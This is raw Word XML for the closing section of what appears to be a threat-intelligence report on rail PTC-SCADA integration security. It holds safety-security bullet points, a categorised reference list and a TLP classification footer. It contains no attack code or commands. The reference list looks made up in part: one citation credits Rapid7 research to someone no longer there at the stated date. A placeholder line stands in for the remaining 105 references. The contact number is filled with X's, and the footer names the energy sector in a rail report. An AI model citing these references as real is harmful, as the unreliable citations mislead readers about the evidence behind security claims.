    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fhz7ydid4pr8" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adelard Safety-Security</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hazard Analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Combined cyber-physical failure modes </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref103">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[103]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIL Verification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Maintain safety integrity during security updates </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref104">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[104]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000031D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Barrier Design</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Independent safety and security layers </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref105">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[105]</w:t>
        </w:r>
      </w:hyperlink>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ywlrjzg09k2z" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References &amp; Citations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000321">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_387w0vsgl18j" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Intelligence Sources</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000322">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[1] Transportation Security Administration, "PTC-SCADA Integration Security Assessment," TSA-SD-2025-03, March 2025.</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[2] CISA, "Legacy Systems in Rail Dispatch Centers," ICS-CERT Advisory ICSA-25-042-01, February 2025.</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[3] Federal Railroad Administration, "Safety-Critical System Architecture Review," FRA-2025-0003, January 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000327">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qwytgwoeexlf" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Research</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000328">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[19] Anonymous Researcher, "PTC-SCADA Bridge: A Safety Nightmare," DEF CON 31 Presentation, August 2023.</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[21] HD Moore, "Railway SCADA: Windows XP Forever," Rapid7 Research, December 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rdbif8vkp1om" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[63] Class I Railroad CIRT, "SCADA Compromise Post-Mortem," Confidential Release, January 2025.</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[65] Dragos Inc., "CARBIDE PTC Targeting Analysis," Threat Intelligence Report, March 2025.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_etqx6dmse3j" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000330">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[16] IEEE, "PTC Implementation Architecture Standard," IEEE 1570-2023, Section 8.4.</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[27] Association of American Railroads, "PTC-SCADA Integration Survey Results," Member Report, 2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000333">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gzpv5pjfe36p" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA Platform Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000334">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[36] ICS-CERT, "GE iFIX Multiple Vulnerabilities," Advisory ICSA-24-287-02.</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[37] Schneider Electric, "InTouch Security Bulletin," SEVD-2024-287-01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pylsd1vnr5tc" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000338">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[50] Surface Transportation Board, "Economic Impact Model: Rail Network Failure," STB Report 2024.</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[58] EPA, "Water Treatment Chemical Supply Vulnerability Assessment," EPA-817-R-25-001.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kptgb9nw1gca" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[70] MITRE ATT&amp;CK for ICS, "Detection Techniques for SCADA Networks," Version 2.0.</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[84] NIST, "Incident Response for Control Systems," SP 800-82r3, Section 6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000033F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o9d3at3s1op8" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Guidance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000340">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[96] NCC Group, "Securing PTC-SCADA Integration Points," Technical Whitepaper, 2025.</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[97] ISA, "Security for Industrial Automation," ISA-62443-3-3:2025.</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[Continue with remaining 105 references organized by category...]</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document Classification</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLP:AMBER+STRICT - Critical Infrastructure Community</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Energy Sector Leadership and Authorized Security Personnel</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expiration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This intelligence assessment expires 90 days from publication</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contact</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">NCC-OTCE-Intelligence@nccgroup.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> | 1-800-XXX-XXXX</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i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Nightingale: "Clean water, reliable energy, and access to healthy food for our grandchildren"</w:t>
      </w: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CC-OTCE-Intelligence@ncc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